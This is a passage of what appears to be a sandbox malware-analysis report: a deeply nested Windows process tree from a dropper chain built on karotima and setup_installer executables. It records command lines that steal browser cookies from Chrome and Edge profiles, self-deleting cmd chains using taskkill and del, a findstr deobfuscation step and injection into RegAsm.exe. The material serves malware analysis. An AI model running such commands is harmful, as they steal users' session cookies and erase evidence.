                                                                                    PID:3776
                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                      C:\Windows\system32\cmd.exe /c karotima_2.exe
                                                                                      9⤵
                                                                                        PID:5124
                                                                                        • C:\Users\Admin\AppData\Local\Temp\7zS812170B5\karotima_2.exe
                                                                                          karotima_2.exe
                                                                                          10⤵
                                                                                          • Executes dropped EXE
                                                                                          PID:5312
                                                                                          • C:\Users\Admin\AppData\Local\Temp\7zS812170B5\karotima_2.exe
                                                                                            "C:\Users\Admin\AppData\Local\Temp\7zS812170B5\karotima_2.exe" -a
                                                                                            11⤵
                                                                                            • Executes dropped EXE
                                                                                            PID:5592
                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                        C:\Windows\system32\cmd.exe /c karotima_1.exe
                                                                                        9⤵
                                                                                          PID:4808
                                                                                          • C:\Users\Admin\AppData\Local\Temp\7zS812170B5\karotima_1.exe
                                                                                            karotima_1.exe
                                                                                            10⤵
                                                                                            • Executes dropped EXE
                                                                                            • Checks computer location settings
                                                                                            PID:5156
                                                                                            • C:\Users\Admin\Documents\audl0_VeNZBC_ovWY7CKOj6Y.exe
                                                                                              "C:\Users\Admin\Documents\audl0_VeNZBC_ovWY7CKOj6Y.exe"
                                                                                              11⤵
                                                                                              • Executes dropped EXE
                                                                                              • Suspicious use of SetThreadContext
                                                                                              PID:1344
                                                                                              • C:\Users\Admin\Documents\audl0_VeNZBC_ovWY7CKOj6Y.exe
                                                                                                C:\Users\Admin\Documents\audl0_VeNZBC_ovWY7CKOj6Y.exe
                                                                                                12⤵
                                                                                                  PID:6996
                                                                                              • C:\Users\Admin\Documents\hD0d1To11xPyJ0KyoiD3WUDb.exe
                                                                                                "C:\Users\Admin\Documents\hD0d1To11xPyJ0KyoiD3WUDb.exe"
                                                                                                11⤵
                                                                                                  PID:5960
                                                                                                  • C:\Users\Admin\AppData\Roaming\8015531.exe
                                                                                                    "C:\Users\Admin\AppData\Roaming\8015531.exe"
                                                                                                    12⤵
                                                                                                      PID:7484
                                                                                                    • C:\Users\Admin\AppData\Roaming\8547604.exe
                                                                                                      "C:\Users\Admin\AppData\Roaming\8547604.exe"
                                                                                                      12⤵
                                                                                                        PID:7640
                                                                                                    • C:\Users\Admin\Documents\F3gr0jezIql8eB7IiTDNzFdx.exe
                                                                                                      "C:\Users\Admin\Documents\F3gr0jezIql8eB7IiTDNzFdx.exe"
                                                                                                      11⤵
                                                                                                      • Suspicious use of SetThreadContext
                                                                                                      • Drops file in Windows directory
                                                                                                      PID:748
                                                                                                      • C:\Users\Admin\Documents\F3gr0jezIql8eB7IiTDNzFdx.exe
                                                                                                        C:\Users\Admin\Documents\F3gr0jezIql8eB7IiTDNzFdx.exe
                                                                                                        12⤵
                                                                                                          PID:7636
                                                                                                      • C:\Users\Admin\Documents\KtnWW_2yLIikFfc94LR7Stvi.exe
                                                                                                        "C:\Users\Admin\Documents\KtnWW_2yLIikFfc94LR7Stvi.exe"
                                                                                                        11⤵
                                                                                                        • Checks BIOS information in registry
                                                                                                        • Checks whether UAC is enabled
                                                                                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                        PID:6180
                                                                                                      • C:\Users\Admin\Documents\wypQmFM9_xM_gY7ocyEMdeSh.exe
                                                                                                        "C:\Users\Admin\Documents\wypQmFM9_xM_gY7ocyEMdeSh.exe"
                                                                                                        11⤵
                                                                                                          PID:6172
                                                                                                          • C:\Users\Admin\Documents\wypQmFM9_xM_gY7ocyEMdeSh.exe
                                                                                                            "C:\Users\Admin\Documents\wypQmFM9_xM_gY7ocyEMdeSh.exe"
                                                                                                            12⤵
                                                                                                            • Modifies data under HKEY_USERS
                                                                                                            PID:9516
                                                                                                        • C:\Users\Admin\Documents\nGOFdHTLSYTaVm6rKZclVRVd.exe
                                                                                                          "C:\Users\Admin\Documents\nGOFdHTLSYTaVm6rKZclVRVd.exe"
                                                                                                          11⤵
                                                                                                          • Checks BIOS information in registry
                                                                                                          • Checks whether UAC is enabled
                                                                                                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                          PID:6164
                                                                                                          • C:\Users\Admin\AppData\Roaming\1234.exe
                                                                                                            C:\Users\Admin\AppData\Roaming\1234.exe 1234
                                                                                                            12⤵
                                                                                                            • Suspicious use of SetThreadContext
                                                                                                            PID:9204
                                                                                                            • C:\Users\Admin\AppData\Roaming\1234.exe
                                                                                                              "{path}"
                                                                                                              13⤵
                                                                                                                PID:9744
                                                                                                              • C:\Users\Admin\AppData\Roaming\1234.exe
                                                                                                                "{path}"
                                                                                                                13⤵
                                                                                                                  PID:9776
                                                                                                                • C:\Users\Admin\AppData\Roaming\1234.exe
                                                                                                                  "{path}"
                                                                                                                  13⤵
                                                                                                                    PID:9792
                                                                                                              • C:\Users\Admin\Documents\L33vnYX4vQCQmkbMfZ4Ha1vl.exe
                                                                                                                "C:\Users\Admin\Documents\L33vnYX4vQCQmkbMfZ4Ha1vl.exe"
                                                                                                                11⤵
                                                                                                                  PID:6156
                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                                                                    C:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                    12⤵
                                                                                                                      PID:7252
                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                                                                      C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                      12⤵
                                                                                                                        PID:5892
                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                                                                                        C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                        12⤵
                                                                                                                          PID:7904
                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                                                                                          C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                          12⤵
                                                                                                                            PID:6816
                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\7zSC78071F6\karotima_1.exe
                                                                                                                              karotima_1.exe
                                                                                                                              13⤵
                                                                                                                              • Checks computer location settings
                                                                                                                              PID:8216
                                                                                                                              • C:\Users\Admin\Documents\VISe3LmTDViO2hY_06q5N8NH.exe
                                                                                                                                "C:\Users\Admin\Documents\VISe3LmTDViO2hY_06q5N8NH.exe"
                                                                                                                                14⤵
                                                                                                                                • Checks BIOS information in registry
                                                                                                                                • Checks whether UAC is enabled
                                                                                                                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                PID:7116
                                                                                                                              • C:\Users\Admin\Documents\c7oo7segTNDDyD72HcU7dxDT.exe
                                                                                                                                "C:\Users\Admin\Documents\c7oo7segTNDDyD72HcU7dxDT.exe"
                                                                                                                                14⤵
                                                                                                                                • Suspicious use of SetThreadContext
                                                                                                                                PID:5032
                                                                                                                                • C:\Users\Admin\Documents\c7oo7segTNDDyD72HcU7dxDT.exe
                                                                                                                                  C:\Users\Admin\Documents\c7oo7segTNDDyD72HcU7dxDT.exe
                                                                                                                                  15⤵
                                                                                                                                    PID:2188
                                                                                                                                  • C:\Users\Admin\Documents\c7oo7segTNDDyD72HcU7dxDT.exe
                                                                                                                                    C:\Users\Admin\Documents\c7oo7segTNDDyD72HcU7dxDT.exe
                                                                                                                                    15⤵
                                                                                                                                    • Executes dropped EXE
                                                                                                                                    • Suspicious use of SetThreadContext
                                                                                                                                    PID:4720
                                                                                                                                • C:\Users\Admin\Documents\J8ufMsp1sVMN_kCN_H08Vf1b.exe
                                                                                                                                  "C:\Users\Admin\Documents\J8ufMsp1sVMN_kCN_H08Vf1b.exe"
                                                                                                                                  14⤵
                                                                                                                                  • Suspicious use of SetThreadContext
                                                                                                                                  PID:9044
                                                                                                                                  • C:\Users\Admin\Documents\J8ufMsp1sVMN_kCN_H08Vf1b.exe
                                                                                                                                    C:\Users\Admin\Documents\J8ufMsp1sVMN_kCN_H08Vf1b.exe
                                                                                                                                    15⤵
                                                                                                                                      PID:9392
                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                        "C:\Windows\System32\cmd.exe" /c taskkill /im J8ufMsp1sVMN_kCN_H08Vf1b.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\J8ufMsp1sVMN_kCN_H08Vf1b.exe" & del C:\ProgramData\*.dll & exit
                                                                                                                                        16⤵
                                                                                                                                          PID:7364
                                                                                                                                          • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                            taskkill /im J8ufMsp1sVMN_kCN_H08Vf1b.exe /f
                                                                                                                                            17⤵
                                                                                                                                            • Kills process with taskkill
                                                                                                                                            PID:10116
                                                                                                                                          • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                            timeout /t 6
                                                                                                                                            17⤵
                                                                                                                                            • Delays execution with timeout.exe
                                                                                                                                            PID:10908
                                                                                                                                    • C:\Users\Admin\Documents\f9ydE1JcEI9WRfOfeGSMcjBH.exe
                                                                                                                                      "C:\Users\Admin\Documents\f9ydE1JcEI9WRfOfeGSMcjBH.exe"
                                                                                                                                      14⤵
                                                                                                                                        PID:3736
                                                                                                                                        • C:\Users\Admin\Documents\f9ydE1JcEI9WRfOfeGSMcjBH.exe
                                                                                                                                          C:\Users\Admin\Documents\f9ydE1JcEI9WRfOfeGSMcjBH.exe
                                                                                                                                          15⤵
                                                                                                                                            PID:9652
                                                                                                                                        • C:\Users\Admin\Documents\0GIlXd9yZp6wsTvuFRvpz6mx.exe
                                                                                                                                          "C:\Users\Admin\Documents\0GIlXd9yZp6wsTvuFRvpz6mx.exe"
                                                                                                                                          14⤵
                                                                                                                                            PID:8580
                                                                                                                                            • C:\Users\Admin\Documents\0GIlXd9yZp6wsTvuFRvpz6mx.exe
                                                                                                                                              C:\Users\Admin\Documents\0GIlXd9yZp6wsTvuFRvpz6mx.exe
                                                                                                                                              15⤵
                                                                                                                                                PID:7856
                                                                                                                                            • C:\Users\Admin\Documents\vnWibiH1W0aJuRL0cDMFsXkK.exe
                                                                                                                                              "C:\Users\Admin\Documents\vnWibiH1W0aJuRL0cDMFsXkK.exe"
                                                                                                                                              14⤵
                                                                                                                                              • Loads dropped DLL
                                                                                                                                              • Checks processor information in registry
                                                                                                                                              PID:7124
                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                "C:\Windows\System32\cmd.exe" /c taskkill /im vnWibiH1W0aJuRL0cDMFsXkK.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\vnWibiH1W0aJuRL0cDMFsXkK.exe" & del C:\ProgramData\*.dll & exit
                                                                                                                                                15⤵
                                                                                                                                                  PID:8692
                                                                                                                                                  • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                    taskkill /im vnWibiH1W0aJuRL0cDMFsXkK.exe /f
                                                                                                                                                    16⤵
                                                                                                                                                    • Kills process with taskkill
                                                                                                                                                    PID:9764
                                                                                                                                                  • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                    timeout /t 6
                                                                                                                                                    16⤵
                                                                                                                                                    • Delays execution with timeout.exe
                                                                                                                                                    PID:8932
                                                                                                                                              • C:\Users\Admin\Documents\knZxoi8AeMtAdd1I6KdVrft_.exe
                                                                                                                                                "C:\Users\Admin\Documents\knZxoi8AeMtAdd1I6KdVrft_.exe"
                                                                                                                                                14⤵
                                                                                                                                                • Suspicious use of SetThreadContext
                                                                                                                                                PID:8652
                                                                                                                                                • C:\Users\Admin\Documents\knZxoi8AeMtAdd1I6KdVrft_.exe
                                                                                                                                                  "C:\Users\Admin\Documents\knZxoi8AeMtAdd1I6KdVrft_.exe"
                                                                                                                                                  15⤵
                                                                                                                                                  • Checks processor information in registry
                                                                                                                                                  PID:8884
                                                                                                                                              • C:\Users\Admin\Documents\9N5W0iYxJCTehyftDpthiczR.exe
                                                                                                                                                "C:\Users\Admin\Documents\9N5W0iYxJCTehyftDpthiczR.exe"
                                                                                                                                                14⤵
                                                                                                                                                  PID:5884
                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\3023574.exe
                                                                                                                                                    "C:\Users\Admin\AppData\Roaming\3023574.exe"
                                                                                                                                                    15⤵
                                                                                                                                                    • Suspicious use of SetThreadContext
                                                                                                                                                    PID:7944
                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\6539450.exe
                                                                                                                                                    "C:\Users\Admin\AppData\Roaming\6539450.exe"
                                                                                                                                                    15⤵
                                                                                                                                                      PID:8380
                                                                                                                                                  • C:\Users\Admin\Documents\yoqOow7h46aMSvyXCu5h1nDt.exe
                                                                                                                                                    "C:\Users\Admin\Documents\yoqOow7h46aMSvyXCu5h1nDt.exe"
                                                                                                                                                    14⤵
                                                                                                                                                    • Drops file in Program Files directory
                                                                                                                                                    PID:8420
                                                                                                                                                  • C:\Users\Admin\Documents\Y3AhzptKS3yrFEeNFHEgKXxq.exe
                                                                                                                                                    "C:\Users\Admin\Documents\Y3AhzptKS3yrFEeNFHEgKXxq.exe"
                                                                                                                                                    14⤵
                                                                                                                                                      PID:7712
                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                        15⤵
                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                        PID:5960
                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                        15⤵
                                                                                                                                                          PID:3476
                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                          15⤵
                                                                                                                                                            PID:9848
                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                            15⤵
                                                                                                                                                              PID:6968
                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                              15⤵
                                                                                                                                                                PID:6188
                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                15⤵
                                                                                                                                                                  PID:10656
                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                  15⤵
                                                                                                                                                                    PID:5872
                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                    15⤵
                                                                                                                                                                      PID:7700
                                                                                                                                                                  • C:\Users\Admin\Documents\tltxokbc1yN35eilGiuHfwDx.exe
                                                                                                                                                                    "C:\Users\Admin\Documents\tltxokbc1yN35eilGiuHfwDx.exe"
                                                                                                                                                                    14⤵
                                                                                                                                                                    • Checks whether UAC is enabled
                                                                                                                                                                    PID:8896
                                                                                                                                                                  • C:\Users\Admin\Documents\DVqb_TDIAzkvLTgUw1yqu20V.exe
                                                                                                                                                                    "C:\Users\Admin\Documents\DVqb_TDIAzkvLTgUw1yqu20V.exe"
                                                                                                                                                                    14⤵
                                                                                                                                                                      PID:3568
                                                                                                                                                                    • C:\Users\Admin\Documents\zonKxae4HwvmLf24aKm5lVWw.exe
                                                                                                                                                                      "C:\Users\Admin\Documents\zonKxae4HwvmLf24aKm5lVWw.exe"
                                                                                                                                                                      14⤵
                                                                                                                                                                      • Suspicious use of SetThreadContext
                                                                                                                                                                      PID:9112
                                                                                                                                                                      • C:\Users\Admin\Documents\zonKxae4HwvmLf24aKm5lVWw.exe
                                                                                                                                                                        C:\Users\Admin\Documents\zonKxae4HwvmLf24aKm5lVWw.exe
                                                                                                                                                                        15⤵
                                                                                                                                                                          PID:7832
                                                                                                                                                                      • C:\Users\Admin\Documents\Ol9TqYZFRp6j2ilrLokMFSL9.exe
                                                                                                                                                                        "C:\Users\Admin\Documents\Ol9TqYZFRp6j2ilrLokMFSL9.exe"
                                                                                                                                                                        14⤵
                                                                                                                                                                          PID:8960
                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
                                                                                                                                                                            15⤵
                                                                                                                                                                              PID:7760
                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7zS05EBB857\setup_install.exe
                                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\7zS05EBB857\setup_install.exe"
                                                                                                                                                                                16⤵
                                                                                                                                                                                  PID:9116
                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                    C:\Windows\system32\cmd.exe /c karotima_2.exe
                                                                                                                                                                                    17⤵
                                                                                                                                                                                      PID:9124
                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7zS05EBB857\karotima_2.exe
                                                                                                                                                                                        karotima_2.exe
                                                                                                                                                                                        18⤵
                                                                                                                                                                                          PID:8100
                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\7zS05EBB857\karotima_2.exe
                                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\7zS05EBB857\karotima_2.exe" -a
                                                                                                                                                                                            19⤵
                                                                                                                                                                                              PID:7956
                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                          C:\Windows\system32\cmd.exe /c karotima_1.exe
                                                                                                                                                                                          17⤵
                                                                                                                                                                                            PID:5868
                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\7zS05EBB857\karotima_1.exe
                                                                                                                                                                                              karotima_1.exe
                                                                                                                                                                                              18⤵
                                                                                                                                                                                              • Checks computer location settings
                                                                                                                                                                                              PID:8224
                                                                                                                                                                                              • C:\Users\Admin\Documents\MVubXEv0WqAPiWWR9vpUFUs9.exe
                                                                                                                                                                                                "C:\Users\Admin\Documents\MVubXEv0WqAPiWWR9vpUFUs9.exe"
                                                                                                                                                                                                19⤵
                                                                                                                                                                                                • Checks BIOS information in registry
                                                                                                                                                                                                • Checks whether UAC is enabled
                                                                                                                                                                                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                • Suspicious use of SetThreadContext
                                                                                                                                                                                                PID:6404
                                                                                                                                                                                                • C:\Users\Admin\Documents\MVubXEv0WqAPiWWR9vpUFUs9.exe
                                                                                                                                                                                                  C:\Users\Admin\Documents\MVubXEv0WqAPiWWR9vpUFUs9.exe
                                                                                                                                                                                                  20⤵
                                                                                                                                                                                                    PID:8440
                                                                                                                                                                                                • C:\Users\Admin\Documents\A_g1YcwWUfOvrE0An2ZxzgUc.exe
                                                                                                                                                                                                  "C:\Users\Admin\Documents\A_g1YcwWUfOvrE0An2ZxzgUc.exe"
                                                                                                                                                                                                  19⤵
                                                                                                                                                                                                  • Suspicious use of SetThreadContext
                                                                                                                                                                                                  PID:9304
                                                                                                                                                                                                  • C:\Users\Admin\Documents\A_g1YcwWUfOvrE0An2ZxzgUc.exe
                                                                                                                                                                                                    C:\Users\Admin\Documents\A_g1YcwWUfOvrE0An2ZxzgUc.exe
                                                                                                                                                                                                    20⤵
                                                                                                                                                                                                      PID:8208
                                                                                                                                                                                                    • C:\Users\Admin\Documents\A_g1YcwWUfOvrE0An2ZxzgUc.exe
                                                                                                                                                                                                      C:\Users\Admin\Documents\A_g1YcwWUfOvrE0An2ZxzgUc.exe
                                                                                                                                                                                                      20⤵
                                                                                                                                                                                                      • Suspicious use of SetThreadContext
                                                                                                                                                                                                      PID:3736
                                                                                                                                                                                                    • C:\Users\Admin\Documents\A_g1YcwWUfOvrE0An2ZxzgUc.exe
                                                                                                                                                                                                      C:\Users\Admin\Documents\A_g1YcwWUfOvrE0An2ZxzgUc.exe
                                                                                                                                                                                                      20⤵
                                                                                                                                                                                                        PID:3196
                                                                                                                                                                                                    • C:\Users\Admin\Documents\QQKX26DbAQgMccBCro2YClFw.exe
                                                                                                                                                                                                      "C:\Users\Admin\Documents\QQKX26DbAQgMccBCro2YClFw.exe"
                                                                                                                                                                                                      19⤵
                                                                                                                                                                                                      • Suspicious use of SetThreadContext
                                                                                                                                                                                                      PID:6964
                                                                                                                                                                                                      • C:\Users\Admin\Documents\QQKX26DbAQgMccBCro2YClFw.exe
                                                                                                                                                                                                        C:\Users\Admin\Documents\QQKX26DbAQgMccBCro2YClFw.exe
                                                                                                                                                                                                        20⤵
                                                                                                                                                                                                          PID:7940
                                                                                                                                                                                                      • C:\Users\Admin\Documents\aGv7glKs8ItP7FtQtEXmd6W5.exe
                                                                                                                                                                                                        "C:\Users\Admin\Documents\aGv7glKs8ItP7FtQtEXmd6W5.exe"
                                                                                                                                                                                                        19⤵
                                                                                                                                                                                                          PID:10124
                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                            "C:\Windows\System32\cmd.exe" /c cmd < Sorrisi.tmp
                                                                                                                                                                                                            20⤵
                                                                                                                                                                                                              PID:6528
                                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                cmd
                                                                                                                                                                                                                21⤵
                                                                                                                                                                                                                  PID:8160
                                                                                                                                                                                                                  • C:\Windows\SysWOW64\findstr.exe
                                                                                                                                                                                                                    findstr /V /R "^yNFefWPitqXbQXexaaaweTJMeyyzoIKOZcrabptodYbHejNKUaJtRjoktSZpRcZcdpbxUJWpgpLtcwKPaxnPYFWNhRgFpV$" Sapete.tmp
                                                                                                                                                                                                                    22⤵
                                                                                                                                                                                                                      PID:6620
                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.004\Acre.exe.com
                                                                                                                                                                                                                      Acre.exe.com k
                                                                                                                                                                                                                      22⤵
                                                                                                                                                                                                                      • Suspicious use of SetThreadContext
                                                                                                                                                                                                                      • Suspicious behavior: MapViewOfSection
                                                                                                                                                                                                                      PID:10320
                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.004\RegAsm.exe
                                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.004\RegAsm.exe
                                                                                                                                                                                                                        23⤵
                                                                                                                                                                                                                          PID:5184
                                                                                                                                                                                                                      • C:\Windows\SysWOW64\PING.EXE
                                                                                                                                                                                                                        ping 127.0.0.1 -n 30
                                                                                                                                                                                                                        22⤵
                                                                                                                                                                                                                        • Runs ping.exe
                                                                                                                                                                                                                        PID:6760
                                                                                                                                                                                                                • C:\Users\Admin\Documents\DJGLJFPl6kE0E1qsxhrDh3RH.exe
                                                                                                                                                                                                                  "C:\Users\Admin\Documents\DJGLJFPl6kE0E1qsxhrDh3RH.exe"
                                                                                                                                                                                                                  19⤵
                                                                                                                                                                                                                  • Checks BIOS information in registry
                                                                                                                                                                                                                  • Checks whether UAC is enabled
                                                                                                                                                                                                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                  PID:5296
                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\1234.exe
                                                                                                                                                                                                                    C:\Users\Admin\AppData\Roaming\1234.exe 1234
                                                                                                                                                                                                                    20⤵
                                                                                                                                                                                                                    • Suspicious use of SetThreadContext
                                                                                                                                                                                                                    PID:8568
                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\1234.exe
                                                                                                                                                                                                                      "{path}"
                                                                                                                                                                                                                      21⤵
                                                                                                                                                                                                                        PID:4172
                                                                                                                                                                                                                  • C:\Users\Admin\Documents\sFDvu_WR0h2PTCy30r6CHskb.exe
                                                                                                                                                                                                                    "C:\Users\Admin\Documents\sFDvu_WR0h2PTCy30r6CHskb.exe"
                                                                                                                                                                                                                    19⤵
                                                                                                                                                                                                                      PID:1868
                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
                                                                                                                                                                                                                        20⤵
                                                                                                                                                                                                                          PID:9880
                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\7zS8960A3D7\setup_install.exe
                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\7zS8960A3D7\setup_install.exe"
                                                                                                                                                                                                                            21⤵
                                                                                                                                                                                                                            • Loads dropped DLL
                                                                                                                                                                                                                            PID:6656
                                                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                              C:\Windows\system32\cmd.exe /c karotima_2.exe
                                                                                                                                                                                                                              22⤵
                                                                                                                                                                                                                                PID:404
                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7zS8960A3D7\karotima_2.exe
                                                                                                                                                                                                                                  karotima_2.exe
                                                                                                                                                                                                                                  23⤵
                                                                                                                                                                                                                                    PID:9176
                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7zS8960A3D7\karotima_2.exe
                                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\7zS8960A3D7\karotima_2.exe" -a
                                                                                                                                                                                                                                      24⤵
                                                                                                                                                                                                                                        PID:7020
                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                    C:\Windows\system32\cmd.exe /c karotima_1.exe
                                                                                                                                                                                                                                    22⤵
                                                                                                                                                                                                                                      PID:5552
                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7zS8960A3D7\karotima_1.exe
                                                                                                                                                                                                                                        karotima_1.exe
                                                                                                                                                                                                                                        23⤵
                                                                                                                                                                                                                                        • Checks computer location settings
                                                                                                                                                                                                                                        PID:8272
                                                                                                                                                                                                                                        • C:\Users\Admin\Documents\YCTrZvq4N7P_Z9DPRKmuxbdp.exe
                                                                                                                                                                                                                                          "C:\Users\Admin\Documents\YCTrZvq4N7P_Z9DPRKmuxbdp.exe"
                                                                                                                                                                                                                                          24⤵
                                                                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                                                                          PID:4340
                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                            "C:\Windows\System32\cmd.exe" /c cmd < Sorrisi.tmp
                                                                                                                                                                                                                                            25⤵
                                                                                                                                                                                                                                              PID:11172
                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                cmd
                                                                                                                                                                                                                                                26⤵
                                                                                                                                                                                                                                                  PID:10036
                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\findstr.exe
                                                                                                                                                                                                                                                    findstr /V /R "^yNFefWPitqXbQXexaaaweTJMeyyzoIKOZcrabptodYbHejNKUaJtRjoktSZpRcZcdpbxUJWpgpLtcwKPaxnPYFWNhRgFpV$" Sapete.tmp
                                                                                                                                                                                                                                                    27⤵
                                                                                                                                                                                                                                                      PID:4256
                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.005\Acre.exe.com
                                                                                                                                                                                                                                                      Acre.exe.com k
                                                                                                                                                                                                                                                      27⤵
                                                                                                                                                                                                                                                      • Suspicious use of SetThreadContext
                                                                                                                                                                                                                                                      • Suspicious behavior: MapViewOfSection
                                                                                                                                                                                                                                                      PID:10504
                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.005\RegAsm.exe
                                                                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.005\RegAsm.exe
                                                                                                                                                                                                                                                        28⤵
                                                                                                                                                                                                                                                          PID:5764
                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\PING.EXE
                                                                                                                                                                                                                                                        ping 127.0.0.1 -n 30
                                                                                                                                                                                                                                                        27⤵
